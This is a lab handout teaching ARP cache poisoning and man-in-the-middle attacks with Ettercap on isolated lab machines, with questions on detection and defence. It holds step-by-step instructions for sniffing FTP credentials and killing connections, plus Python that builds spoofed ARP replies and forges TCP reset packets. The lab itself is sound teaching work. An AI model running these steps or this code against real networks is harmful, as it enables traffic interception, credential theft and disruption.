Spoofing and Man-in-the-Middle Attacks
Date Assigned: mm/dd/yyyy
Time Due: mm/dd/yyyy by hh:mm
Educational Objectives
This lab will introduce you to both ARP spoofing and man-in-the-middle attacks and how they
are carried out within a networked environment.
Lab Environment
The following machines are needed to conduct this lab:
- CentOS Linux, CENTOS6.4
- Backtrack 5, BT5R3
- Windows 7, Win7
- Fedora 18, FC18
All computers must be networked and accessible to each other.
Summary
When you connect to a computer you usually take for granted the protocols used to find the
destination machine. On a LAN, the IP address of the next hop is resolved to a MAC address,
so that a frame can actually be delivered, by ARP (Address Resolution Protocol).
In this lab you will learn how to poison victims' ARP caches and passively sniff connections.
Before software is used to poison an ARP cache you must first do some preliminary exercises
to understand how to read and manipulate your own ARP cache. Once you understand ARP and how
the cache is used, the next few exercises use ARP poisoning to sniff and attack connections.
The first of these introduces Ettercap, a powerful tool for ARP poisoning and other LAN
attacks. Next you will passively and then actively interfere with a connection between two
victim machines. After completing these exercises you will have a good understanding of how
man-in-the-middle attacks occur.
Background
What is ARP?
Address Resolution Protocol (ARP) maps an Internet Protocol address (IP address) to the
physical address a device is known by on the local network. In IP version 4, still the most
widely deployed version, an address is 32 bits long; on an Ethernet LAN, however, the
addresses of attached devices are 48 bits long. (The physical address is also known as a
Media Access Control or MAC address.) A table, usually called the ARP cache, holds the
IP-to-MAC correlations a host has learned, and ARP defines the rules for discovering and
refreshing them. (The reverse direction, MAC to IP, is handled by a separate protocol, RARP,
mentioned below.)
How ARP Works
When a host (or a gateway forwarding into the LAN) has an IP packet to deliver to a machine on
the local network, it asks its ARP implementation for the MAC address that matches the
destination IP address. ARP first looks in the ARP cache and, if an entry is found, returns it
so that the packet can be framed and sent to that MAC address. If no entry is found, ARP
broadcasts a request to every machine on the LAN asking who holds that IP address. The machine
that recognizes the IP address as its own returns a reply; the requester stores the mapping in
its ARP cache for future use and then sends the packet to the MAC address that replied. Since
link-layer details differ, there are separate ARP Requests for Comments (RFCs) for Ethernet,
ATM, Fiber Distributed Data Interface and other link types. There is also a Reverse ARP (RARP)
for host machines that don't know their own IP address; it lets them ask a RARP server on the
LAN for one (a role now filled by DHCP).
What is ARP poison and a man in the middle attack?
The Address Resolution Protocol serves the function of determining the mapping between IP
addresses and MAC hardware addresses on local networks. For example, a host that wants to
send a message to IP address 10.0.0.2 on the local network sends a broadcast ARP packet that
requests the MAC for that IP. The host that owns the IP 10.0.0.2 returns an ARP reply packet
with its MAC address. The requesting host then sends the message, and stores the IP-to-MAC
mapping for future packets.
In order to minimize network traffic, ARP implementations update their cache of IP-to-MAC
mappings whenever an ARP request or reply is received. If the MAC address reported in the
packet for a given IP differs from the cached one, the new value overwrites the old one. ARP
replies are normally unicast packets directed at one machine, so only that machine updates its
cache. Nothing in the protocol authenticates a reply.
Figure 1. Setting up a man in the middle attack by C against A and B.
The particular kind of ARP attack examined in this lab is the use of ARP reply packets to
perform cache poisoning. This attack makes possible many sorts of man-in-the-middle attacks.
Consider an example depicted in Figure 1. The attacker, Host C, sends an ARP reply to B stating
that A’s IP maps to C’s MAC address, and another ARP reply to A stating that B’s IP maps to
C’s MAC address. Since ARP is a stateless protocol, hosts A and B assume that they sent an
ARP request at some point in the past and update their ARP caches with this new information.
Figure 2. Computer C performs a man in the middle attack against A and B.
Now, when A tries to send a packet to B it will go to C instead. Host C can use this unique
position to forward the packets on to the correct host and monitor or modify them as they pass
through C (Figure 2). This man in the middle attack allows C to monitor or modify telnet
sessions, read mail passing over Post Office Protocol (POP) or SMTP, intercept SSH
negotiations, monitor and display Web usage, and commit many other malicious activities.
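As an added illustration (not part of the original lab handout), the following Python builds the two spoofed ARP replies that Host C sends in Figure 1, parses them back, and applies them to a toy model of A's and B's ARP caches using the stateless update rule described above. The addresses are made up, the ArpCache class is a simplification of a real kernel neighbour table, and the static-entry check models the kind of manually added (arp -s) entry exercised later in the lab.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(b):
    return ":".join("%02x" % x for x in b)


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip, eth_dst=None):
    """Ethernet II frame carrying an RFC 826 ARP packet (14 + 28 bytes).

    The Ethernet source is always the real sender; the lie in a spoofed reply
    lives only in the ARP body's sender_mac / sender_ip pair.
    """
    eth = struct.pack("!6s6sH", mac_bytes(eth_dst or target_mac),
                      mac_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s",
                      1,        # hardware type: Ethernet
                      0x0800,   # protocol type: IPv4
                      6, 4,     # hardware / protocol address lengths
                      op,
                      mac_bytes(sender_mac), ip_bytes(sender_ip),
                      mac_bytes(target_mac), ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame):
    eth_dst, eth_src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    (_, _, _, _, op, smac, sip, tmac, tip) = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {"eth_src": mac_str(eth_src), "eth_dst": mac_str(eth_dst), "op": op,
            "sender_mac": mac_str(smac), "sender_ip": ip_str(sip),
            "target_mac": mac_str(tmac), "target_ip": ip_str(tip)}


class ArpCache:
    """Toy ARP cache: ip -> (mac, flags). Flags mimic `arp` output: C = complete,
    CM = complete and permanent (added by hand with `arp -s`)."""

    def __init__(self):
        self.entries = {}

    def add_static(self, ip, mac):
        self.entries[ip] = (mac, "CM")

    def on_arp(self, frame):
        """Stateless update rule from the text: any request or reply refreshes the
        sender's entry, unless that entry is static. Returns True if it changed."""
        p = parse_arp(frame)
        current = self.entries.get(p["sender_ip"])
        if current and "M" in current[1]:
            return False
        self.entries[p["sender_ip"]] = (p["sender_mac"], "C")
        return True

    def lookup(self, ip):
        return self.entries[ip][0]


# Constructed addresses for the three hosts of Figure 1 (not the real Table 1 values).
A = ("10.0.0.1", "aa:aa:aa:aa:aa:01")   # victim, e.g. CENTOS6.4
B = ("10.0.0.2", "bb:bb:bb:bb:bb:02")   # victim, e.g. Win7
C = ("10.0.0.3", "cc:cc:cc:cc:cc:03")   # attacker, e.g. BT5R3


def poison_reply(victim, impersonated, attacker_mac):
    """Unicast ARP reply to `victim` claiming `impersonated`'s IP is at the attacker's MAC."""
    return build_arp(ARP_REPLY, attacker_mac, impersonated[0], victim[1], victim[0])


def run_attack(static_on_a=False):
    """Returns (what A believes B's MAC is, what B believes A's MAC is) after poisoning."""
    cache_a, cache_b = ArpCache(), ArpCache()
    cache_a.on_arp(build_arp(ARP_REPLY, B[1], B[0], A[1], A[0]))   # legitimate learning
    cache_b.on_arp(build_arp(ARP_REPLY, A[1], A[0], B[1], B[0]))
    if static_on_a:
        cache_a.add_static(B[0], B[1])                              # the `arp -s` defence
    cache_a.on_arp(poison_reply(A, B, C[1]))   # tells A: "B is at C's MAC"
    cache_b.on_arp(poison_reply(B, A, C[1]))   # tells B: "A is at C's MAC"
    return cache_a.lookup(B[0]), cache_b.lookup(A[0])


if __name__ == "__main__":
    print(run_attack())                   # both victims now resolve each other to C
    print(run_attack(static_on_a=True))   # A keeps B's real MAC; B is still poisoned
```

Real kernels attach more conditions to the update rule (for instance about when an unsolicited reply may create a brand-new entry), but an existing dynamic entry is overwritten, which is all the attack needs; note in the second run that protecting A alone still leaves B's half of the conversation in C's hands.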
The ARP cache poisoning attack can be used against all machines in the same broadcast domain
as the attacker. Hence it works over hubs, bridges, and switches, but not across routers. An
attacker can, in fact, poison the ARP cache of the router itself, but the router won't pass the
ARP packets along to its other links. Plain switch port security, which binds a source MAC
address to a port, does not prevent the attack: the attacker's frames carry the attacker's own,
genuine source MAC, and the false binding sits inside the ARP payload, which port security
never inspects. Switch features that do inspect ARP payloads (Dynamic ARP Inspection, usually
fed by DHCP snooping) can block it.
The tool that was used in demonstrating and testing the effectiveness of these attacks was
Ettercap. Developed as an open source project, Ettercap provides both a menu based and
command line tool to perform ARP cache poisoning and man in the middle attacks against
switched networks (among other things).
What is Ettercap?
(http://Ettercap.sourceforge.net/)
Ettercap is a multi-functional packet sniffer/interceptor/logger that works on switched LANs. It
allows the active and passive dissection of numerous protocols, including ciphered ones, such as
SSH1, and includes features for network and host analysis.
Section 0: Setup and installation
0.1: Installing Ettercap
Ettercap is already installed on your BT5R3 machine (BackTrack is Debian-based, so the yum
commands below do not apply there). If you would rather run it from FC18, install it with yum:
# yum install ettercap
# yum install ettercap-common
# yum install ettercap-gtk
Test Ettercap
# ettercap -v
If your installation completed successfully, you will be able to see “Ettercap NG-0.7.3”.
0.2: Checking the FTP servers
Now make sure that you have an FTP server installed and running on your CENTOS6.4 machine.
# yum search ftpd
# yum install vsftpd
Start ftp:
# /etc/init.d/vsftpd start
Test it locally with an FTP client by connecting to 127.0.0.1.
0.3: Telnet Server Win7
Make sure the Telnet server is installed on your Windows 7 machine, and is running:
Start the Telnet service from an administrator command prompt ("net start tlntsvr" also works):
C:\> tlntsvr.exe /service
Note: If the Telnet service is not installed, install it as follows:
Control Panel -> Programs and Features -> Turn Windows features on or off -> Telnet
Server
0.4: Telnet Server CENTOS6.4
Make sure the Telnet server is installed on your CENTOS6.4 machine, and is running. On CentOS 6
telnet is managed by xinetd and is disabled by default, so enable it before starting xinetd:
# yum search telnet
# yum install telnet-server telnet
# chkconfig telnet on
# /etc/init.d/xinetd start
0.5: Wireshark CENTOS6.4 and BT5R3
Check to make certain that both operating systems have Wireshark installed (BT5R3 ships with
it; on CENTOS6.4 install it if necessary):
# yum install wireshark-gnome
Section 1: ARP
By now you should have a clear understanding of what ARP is and how it works. Now you will get
a chance to learn more about this protocol and how to abuse it, by doing some exercises. In the
first exercise you will learn how to read your own ARP cache in Linux (Windows is very similar)
and how to modify it. After learning the basic OS commands to control your ARP cache, you will
use the program Ettercap to poison other computers' caches on the network.
Before doing the lab it is important to understand which machine is being used in each
situation. Each machine's hardware address will be identified by the notation a:b:c:d:e:f.
Make sure you substitute the appropriate hardware address whenever you see a:b:c:d:e:f.
1.1 Getting to Know ARP and ARP Tables
1) First you are going to observe the initial state of your ARP cache.
Open up a terminal on your CENTOS6.4 machine:
# arp
If the table is empty, think about exactly when a computer starts sending out ARP packets to
discover hosts on the network.
2) Now you are going to observe as entries are added to the ARP cache.
On the CENTOS6.4 machine:
- First start the program Wireshark to capture ARP packets.
- Make certain that Wireshark will stop the capture after 30 packets, then start capturing.
- Next ping the BT5R3 machine from the terminal.
- If Wireshark has not already stopped capturing packets, click < stop >.
- Review the captured ARP packets in Wireshark.
- Next check the ARP cache on the CENTOS6.4 machine.
- Next ping the Win7 machine.
- Next check the ARP cache on the CENTOS6.4 machine.
Q1.1.1: What did you see after typing “ARP”? Why is this?
3) Finally, before you move on to the next part of the lab, make a table of each machine's IP
address and its corresponding hardware address.
Table 1. IP addresses and hardware addresses
Computer      IP Address      Hardware Address
BT5R3
CENTOS6.4
Windows 7
4) In addition to just observing the ARP cache, the ARP cache can be manipulated with the
"arp" command, which also allows the user to enter IP-to-hardware-address mappings by hand.
Although on a large network this would require a lot of labor, it is an easy way for networks
with static IP addresses to defeat ARP poisoning attempts. An entry added manually is static:
the kernel does not overwrite it when an ARP reply arrives, so it can only be changed by an
administrator on that computer. Let's work with some of these other commands now.
On the CENTOS6.4 machine:
Use the “ARP” help feature and look through the possible options.
# yum install man
# man arp
Next edit the cache manually by deleting the BT5R3 entry
Q.1.1.2: What command did you use to delete the entry?
Make certain to verify the new ARP cache
Next edit the cache manually by adding back the deleted BT5R3 entry so that it is static.
Q.1.1.3: What command did you use to manually add the entry?
Make certain to verify the ARP cache again
The static entry should be identified by the flag ‘CM’
Q1.1.4: What is the significance of ‘CM’? Make certain that you provide a detailed
response.
Finally remove the static entry
1.2. Using ARP
1) Now you are going to test what happens when an IP address is mapped to the wrong hardware
address. Before you use an ARP poisoning program to do this, you are going to do it manually.
2) Using the arp command as in the previous section, add a static entry for the BT5R3 machine
with a deliberately wrong hardware address.
3) Make certain to verify the ARP cache again. The static entry should be identified by the
flag 'CM'.
4) When completed, try to ping the BT5R3 machine from CENTOS6.4.
Q1.2.1 What happened when the machine was pinged? Why did this happen?
Section 2: Ettercap
2.1. Creating FTP Access
For the next few exercises you are going to use the BT5R3 machine as the attacking machine
and the Win7 machine and CENTOS6.4 machine to communicate with each other using various
ports. These machines will be the unknowing victims within the network.
1. Make certain that you create an account that can be used to access CENTOS6.4's FTP
server.
2. Write the username and password for this account below:
Table 2. Created FTP Account for the CENTOS6.4 Machine
Computer      Username      Password
CENTOS6.4
3. Also on CENTOS6.4, create a simple text file named no_protection.txt within the
/var/ftp/pub directory. This file will be used to transfer from CENTOS6.4 to Win7 via
FTP.
# cd /var/ftp/pub
# echo [YOURMTUUSERID] > no_protection.txt
2.2. Getting to Know Ettercap
When Ettercap is started, it first probes the network to see all of the hosts that are on it.
It does this by sending out an ARP request for each IP address in the local subnet (the range
is derived from the host's own address and netmask). Only addresses with a live host behind
them reply, giving the attacker a good indication of who is on the network. Why does this work
so well? Because every host must answer ARP for its own address, or it cannot communicate at
all.
Although Ettercap is best used by command-line, for this introductory use, we will use the
program’s GUI interface.
Start Ettercap 0.7.3 on your BT5R3 machine, type
#ettercap -G
at a command prompt window. You should see the following screen:
Figure 3 Ettercap GUI
Let’s see how Ettercap scans your addresses.
On your CENTOS6.4 machine:
Open Wireshark
Start capture
On your BT5R3 machine using the Ettercap application:
Note: Do not scan the entire network!!!
Conduct a quick scan that covers only a /24 (class C sized) range by setting the netmask to
255.255.255.0:
- Select Options
- Netmask
- Type 255.255.255.0
Alternatively, save a host list to a file and load that file instead of scanning.
1. Select Sniff - Unified Sniffing using the Ethernet interface assigned to your BT5R3
machine (i.e. eth0)
2. Then Hosts - Scan for hosts (this scans the subnet rather than using a host file)
3. Once Ettercap is done scanning, stop the Wireshark packet capture
4. Make certain to notice how Wireshark views the Ettercap scan.
Q.2.2.1: How could you use software to detect that Ettercap is being run on your network?
Remember to give a detailed response.
2.3. Using Ettercap Passively to Sniff a Connection
Now you are going to use the skills you learned in the previous section to perform a man in the
middle attack on a connection. For this scenario a user on the Win7 machine will attempt to login
to the ftp server on the CENTOS6.4 machine. Unknown to the victim, the attacker on the BT5R3
machine will be in the middle of the connection watching and logging the actions of the
victim(s).
First you must use Ettercap to select the victim machines and ARP poison them.
On the BT5R3 Ettercap GUI:
- Check the host list and select CENTOS6.4 and Win7 as the two targets
- Hosts - Host list
- Select CENTOS6.4 IP - Add to Target 1
- Select Win7 IP - Add to Target 2
- Select Start->Start Sniffing
- Conduct the man-in-the-middle by selecting Mitm->ARP poisoning - Sniff remote
connections
- Once this is complete select View->Connections
Now that the ARP poison has taken place between the two targets, conduct the following:
On the Win7 machine:
- Open a command prompt if one isn't already open
- Show its ARP cache (arp -a)
On the CENTOS6.4 machine:
- Open a terminal if one isn't already open
- Show its ARP cache
Q.2.3.1: What did you see different about the ARP cache on the two virtual machines
compared to before?
2.4. Displaying Ettercap’s Abilities to Conduct Man-in-the-Middle Attack
To illustrate how Ettercap can conduct a man-in-the-middle attack, you will be logging into
CENTOS6.4's FTP server from Win7.
Before this takes place, make certain that you start another Wireshark session on the BT5R3
machine to help you clearly see all of the packets involved in the attack.
On the BT5R3 machine:
- Open Wireshark if it is not already open
- Set the capture to stop after 300 packets
- Start the packet capture
On the Win7 machine:
- In the command prompt, ftp into the CENTOS6.4 machine
- At the prompt enter the user name and then the password for the user created earlier
- Type in a few commands to create data to see
- Before you exit, also download the new text file (no_protection.txt) to the Win7
machine
On the BT5R3 machine:
- Stop the Wireshark capture if it has not stopped already
- In Wireshark, look at the packets from the ftp session
- Judging by the IP addresses alone, the connection appears to go from the original
source to the original destination
- On one of these same packets, expand the Ethernet section and look at the hardware
addresses
- Make certain to view an ftp packet and its source and destination hardware addresses
Q2.4.1: What did you notice about the packets' hardware addresses compared to their IP
addresses? How would software looking to detect this attack fail?
Q2.4.2: Were you able to get the userid and password using Ettercap?
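Added detection example (Python, not part of the lab handout): two checks run over a constructed capture that stands in for what Wireshark showed in Sections 2.2 and 2.4. The first flags the burst of ARP requests that Ettercap's host scan produces; the second compares each frame's Ethernet addresses against a trusted IP-to-MAC table of the kind you built in Table 1, which is exactly what an IP-header-only tool never does. The Frame record, the addresses, the thresholds and the capture itself are all assumptions made up for the example.

```python
from collections import defaultdict
from typing import NamedTuple


class Frame(NamedTuple):
    ts: float
    eth_src: str
    eth_dst: str
    kind: str      # "arp-req", "arp-rep" or "ip"
    ip_src: str    # ARP: sender protocol address; IP: source address
    ip_dst: str    # ARP: target protocol address; IP: destination address


def detect_arp_sweep(frames, window=5.0, min_targets=64):
    """One MAC asking for many distinct IPs within `window` seconds is a host scan.
    Returns [(mac, distinct_targets_overall)] for each offending source."""
    per_src = defaultdict(list)
    for f in frames:
        if f.kind == "arp-req":
            per_src[f.eth_src].append(f)
    alerts = []
    for mac, reqs in per_src.items():
        reqs.sort(key=lambda r: r.ts)
        lo = 0
        for hi, f in enumerate(reqs):
            while f.ts - reqs[lo].ts > window:
                lo += 1
            if len({r.ip_dst for r in reqs[lo:hi + 1]}) >= min_targets:
                alerts.append((mac, len({r.ip_dst for r in reqs})))
                break
    return alerts


def detect_poisoning(frames, baseline, check_ethernet=True):
    """Cross-check hardware addresses against a trusted ip -> mac table.

    With check_ethernet=False the function sees only the IP layer; the relayed
    FTP traffic then looks perfectly normal, because both IP addresses are the
    real endpoints. Returns a list of (ts, where, message) alerts."""
    if not check_ethernet:
        return [(f.ts, "ip", "unknown host %s" % f.ip_src)
                for f in frames if f.kind == "ip" and f.ip_src not in baseline]
    alerts = []
    for f in frames:
        if f.kind == "arp-rep":
            expected = baseline.get(f.ip_src)
            if expected and expected != f.eth_src:
                alerts.append((f.ts, "arp", "%s claimed by %s, expected %s"
                               % (f.ip_src, f.eth_src, expected)))
        elif f.kind == "ip":
            for ip, mac, side in ((f.ip_src, f.eth_src, "src"), (f.ip_dst, f.eth_dst, "dst")):
                expected = baseline.get(ip)
                if expected and expected != mac:
                    alerts.append((f.ts, side, "%s carried by %s, expected %s"
                                   % (ip, mac, expected)))
    return alerts


# Constructed stand-ins for Table 1 (not real lab addresses).
CENTOS, WIN7, BT5 = "10.0.0.1", "10.0.0.2", "10.0.0.3"
BASELINE = {CENTOS: "aa:aa:aa:aa:aa:01", WIN7: "bb:bb:bb:bb:bb:02", BT5: "cc:cc:cc:cc:cc:03"}
BCAST = "ff:ff:ff:ff:ff:ff"


def constructed_capture():
    mac = BASELINE
    frames = [Frame(0.01 * i, mac[BT5], BCAST, "arp-req", BT5, "10.0.0.%d" % i)
              for i in range(1, 255)]                                    # Ettercap scanning the /24
    frames.append(Frame(5.0, mac[CENTOS], mac[WIN7], "ip", CENTOS, WIN7))  # ordinary traffic
    frames += [
        Frame(10.0, mac[BT5], mac[CENTOS], "arp-rep", WIN7, CENTOS),     # "Win7 is at BT5's MAC"
        Frame(10.0, mac[BT5], mac[WIN7], "arp-rep", CENTOS, WIN7),       # "CentOS is at BT5's MAC"
        Frame(11.0, mac[WIN7], mac[BT5], "ip", WIN7, CENTOS),            # FTP login, diverted to BT5
        Frame(11.01, mac[BT5], mac[CENTOS], "ip", WIN7, CENTOS),         # BT5 relays it onward
    ]
    return frames


if __name__ == "__main__":
    cap = constructed_capture()
    print(detect_arp_sweep(cap))
    for alert in detect_poisoning(cap, BASELINE):
        print(alert)
    print(detect_poisoning(cap, BASELINE, check_ethernet=False))   # nothing: IP headers look fine
```

The sweep detector is deliberately crude (a host that is simply busy could trip a low threshold), and the baseline table must itself be trustworthy and complete, which on a DHCP network usually means deriving it from the DHCP server's leases rather than from whatever ARP happened to say first.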
2.5. Using Ettercap Actively to Disrupt a Connection
Ettercap also has a wide variety of methods to disrupt a connection. Using the existing FTP
connection that has been established between the Win7 and CENTOS6.4 machine, attempt to
inject data or a file into this connection on either or both victim computers.
Q.2.5.1: Were you successful? Why or why not?
Now go ahead and "kill" the FTP connection between the victim machines. Once completed, you
should be able to see from the Win7 machine, which established the FTP connection to the
CENTOS6.4 machine, that the connection was broken.
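Added example (Python, not from the lab or from Ettercap's own source) of what "killing" a connection from the middle amounts to: TCP reset injection. Given one segment observed in the relayed stream, the code forges an IPv4/TCP RST toward each endpoint with a sequence number that side will accept and computes the checksums so the packets would be valid on the wire. The addresses, ports and sequence numbers are made up; actually sending the result needs a raw socket and root, which is deliberately left out.

```python
import struct

TH_RST, TH_ACK = 0x04, 0x10


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def ip_str(b):
    return ".".join(str(x) for x in b)


def inet_checksum(data):
    """RFC 1071 one's-complement sum; yields 0 over data that already carries its checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_header(src, dst, payload_len, proto=6, ttl=64):
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0x4000,
                      ttl, proto, 0, ip_bytes(src), ip_bytes(dst))
    return hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]


def tcp_packet(src, dst, sport, dport, seq, ack, flags, window=0, payload=b""):
    """IPv4 + TCP with a valid TCP checksum (computed over the pseudo-header)."""
    def header(csum):
        return struct.pack("!HHIIBBHHH", sport, dport, seq & 0xFFFFFFFF, ack & 0xFFFFFFFF,
                           5 << 4, flags, window, csum, 0)
    pseudo = struct.pack("!4s4sBBH", ip_bytes(src), ip_bytes(dst), 0, 6, 20 + len(payload))
    csum = inet_checksum(pseudo + header(0) + payload)
    return ipv4_header(src, dst, 20 + len(payload)) + header(csum) + payload


def parse_tcp(packet):
    """Decode IPv4 + TCP headers and verify the TCP checksum."""
    ihl = (packet[0] & 0x0F) * 4
    tcp = packet[ihl:]
    sport, dport, seq, ack, _, flags, _, _, _ = struct.unpack("!HHIIBBHHH", tcp[:20])
    pseudo = struct.pack("!4s4sBBH", packet[12:16], packet[16:20], 0, 6, len(tcp))
    return {"src": ip_str(packet[12:16]), "dst": ip_str(packet[16:20]),
            "sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags,
            "checksum_ok": inet_checksum(pseudo + tcp) == 0}


def rst_pair(obs):
    """obs: one client->server segment seen from the middle, as a dict with keys
    client, server, cport, sport, seq, ack, payload_len.

    The server next expects byte seq+payload_len from the client, and the client
    next expects byte `ack` from the server; a RST carrying exactly that sequence
    number is in-window for the receiver. Returns (rst_to_server, rst_to_client)."""
    nxt = obs["seq"] + obs["payload_len"]
    to_server = tcp_packet(obs["client"], obs["server"], obs["cport"], obs["sport"],
                           seq=nxt, ack=obs["ack"], flags=TH_RST | TH_ACK)
    to_client = tcp_packet(obs["server"], obs["client"], obs["sport"], obs["cport"],
                           seq=obs["ack"], ack=nxt, flags=TH_RST | TH_ACK)
    return to_server, to_client


# Constructed observation: Win7 sending "USER alice\r\n" on the CentOS FTP control channel.
OBSERVED = {"client": "10.0.0.2", "server": "10.0.0.1", "cport": 49152, "sport": 21,
            "seq": 1000, "ack": 5000, "payload_len": len(b"USER alice\r\n")}

if __name__ == "__main__":
    for pkt in rst_pair(OBSERVED):
        print(parse_tcp(pkt))
```

The whole trick rests on the man in the middle seeing live sequence numbers; an attacker who is not on path has to guess them, which is the reason off-path resets are so much harder than the on-path kill this lab performs.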
Q.2.5.2: How would you proceed to avoid an attacker from being able to shut down
computer connections such as FTP between CENTOS6.4 and Win7? Make certain to be
specific in order to demonstrate your knowledge on this topic.
Optional ~ Section 3: Create your own MiTM (3 Bonus Points)
There is more than one way to use Ettercap, or other programs (e.g. Hunt), to implement a MiTM
attack. You are encouraged to try other types of MiTM attacks and programs and then write up a
small summary of what you did along with how you would protect against this attack. Also
include screenshots validating the MiTM attack.
Section 4: General Questions
Q4.1. Any corrections or general comments about this lab?
Q4.2. How long did it take you to complete this lab?
Q4.3. On a scale of 1-10 (with 1 being easy and 10 being difficult) how would you rate this
lab?
Answer Sheet
Q.1.1.1: What did you see after typing “ARP”? Why is this?
Q.1.1.2: What command did you use to delete the entry?
Q.1.1.3: What command did you use to manually add the entry?
Q.1.1.4: What is the significance of ‘CM’? Make certain that you provide a detailed
response.
Q1.2.1 What happened when the machine was pinged? Why did this happen?
Q.2.2.1: How could you use software to detect that Ettercap is being run on your network?
Remember to give a detailed response.
Q.2.3.1: What did you see different about the ARP cache on the two virtual machines
compared to before? Make certain to explain your answer to demonstrate your knowledge
on this topic.
Q2.4.1: What did you notice about the packets hardware address compared to its IP
address? How would software looking to detect this attack fail?
Q2.4.2: Were you able to get the userid and password on the BT5R3 machine using
Ettercap?
Q.2.5.1: Were you successful? Why or why not?
Q.2.5.2: How would you proceed to avoid an attacker from being able to shut down
computer connections such as FTP between CENTOS6.4 and Win7? Make certain to be
specific in order to demonstrate your knowledge on this topic.